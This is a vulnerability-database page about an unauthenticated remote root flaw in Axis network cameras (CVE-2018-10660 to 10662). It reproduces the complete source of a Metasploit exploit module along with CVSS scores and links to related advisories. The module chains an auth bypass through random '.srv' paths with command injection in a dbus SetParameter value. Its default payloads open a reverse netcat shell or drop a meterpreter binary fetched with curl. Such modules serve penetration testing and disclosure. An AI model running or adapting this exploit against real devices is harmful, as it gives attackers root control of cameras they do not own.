Lucene search
Or Peles, wvu <[email protected]>, sinn3r <[email protected]>, Brent Cook, Jacob Robles, Matthew Kienow, Shelby Pace, Chris Lee, Cale BlackMSF:EXPLOIT-LINUX-HTTP-AXIS_SRV_PARHAND_RCE-HistoryJul 12, 2018 - 11:46 p.m.
Axis Network Camera .srv-to-parhand RCE
2018-07-1223:46:49
Or Peles, wvu <[email protected]>, sinn3r <[email protected]>, Brent Cook, Jacob Robles, Matthew Kienow, Shelby Pace, Chris Lee, Cale Black
www.rapid7.com
50
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
This module exploits an auth bypass in .srv functionality and a command injection in parhand to execute code as the root user.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis Network Camera .srv-to-parhand RCE',
'Description' => %q{
This module exploits an auth bypass in .srv functionality and a
command injection in parhand to execute code as the root user.
},
'Author' => [
'Or Peles', # Vulnerability discovery (VDOO)
'wvu', # Metasploit module
'sinn3r', # Metasploit module
'Brent Cook', # Metasploit module
'Jacob Robles', # Metasploit module
'Matthew Kienow', # Metasploit module
'Shelby Pace', # Metasploit module
'Chris Lee', # Metasploit module
'Cale Black' # Metasploit module
],
'References' => [
['CVE', '2018-10660'],
['CVE', '2018-10661'],
['CVE', '2018-10662'],
['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
],
'DisclosureDate' => '2018-06-18',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'BadChars' => ' ',
'Encoder' => 'cmd/ifs',
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat-e'
}
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {'WfsDelay' => 10}
))
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => "/index.html/#{rand_srv}"
)
if res && res.code == 204
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager(flavor: :curl, nospace: true)
end
end
def execute_command(cmd, opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => "/index.html/#{rand_srv}",
'vars_post' => {
'action' => 'dbus',
'args' => dbus_send(
method: :set_param,
param: "string:root.Time.DST.Enabled string:;(#{cmd})&"
)
}
)
send_request_cgi(
'method' => 'POST',
'uri' => "/index.html/#{rand_srv}",
'vars_post' => {
'action' => 'dbus',
'args' => dbus_send(method: :synch_params)
}
)
end
def dbus_send(method:, param: nil)
args = '--system --dest=com.axis.PolicyKitParhand ' \
'--type=method_call /com/axis/PolicyKitParhand '
args <<
case method
when :set_param
"com.axis.PolicyKitParhand.SetParameter #{param}"
when :synch_params
'com.axis.PolicyKitParhand.SynchParameters'
end
args
end
def rand_srv
"#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
end
end
Related
myhack58
myhack58
exploitdb
exploitdb
Axis Network Camera - .srv to parhand Remote Code Execution (Metasploit)
2018-07-27 00:00:00
packetstorm
packetstorm
Axis Network Camera Remote Command Execution
2018-07-26 00:00:00
zdt
zdt
Axis Network Camera Remote Command Execution Exploit
2018-07-27 00:00:00
openvas
openvas
Axis Network Camera Multiple Vulnerabilities (Jun 2018)
2018-06-19 00:00:00
nessus
nessus
AXIS Multiple Vulnerabilities (ACV-128401)
2018-10-02 00:00:00
Axis Communication Multiple IP Cameras Command Injection (CVE-2018-10660)
2024-01-23 00:00:00
threatpost
threatpost
Axis Cameras Riddled With Vulnerabilities Enabling βFull Controlβ
2018-06-18 13:00:04
prion
prion
Command injection
2018-06-26 18:29:00
Design/Logic Flaw
2018-06-26 18:29:00
Improper access control
2018-06-26 18:29:00
cvelist
cvelist
attackerkb
attackerkb
CVE-2018-10662
2018-06-26 00:00:00
CVE-2018-10661
2018-06-26 00:00:00
cve
cve
nvd
nvd
checkpoint_advisories
checkpoint_advisories
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Related for MSF:EXPLOIT-LINUX-HTTP-AXIS_SRV_PARHAND_RCE-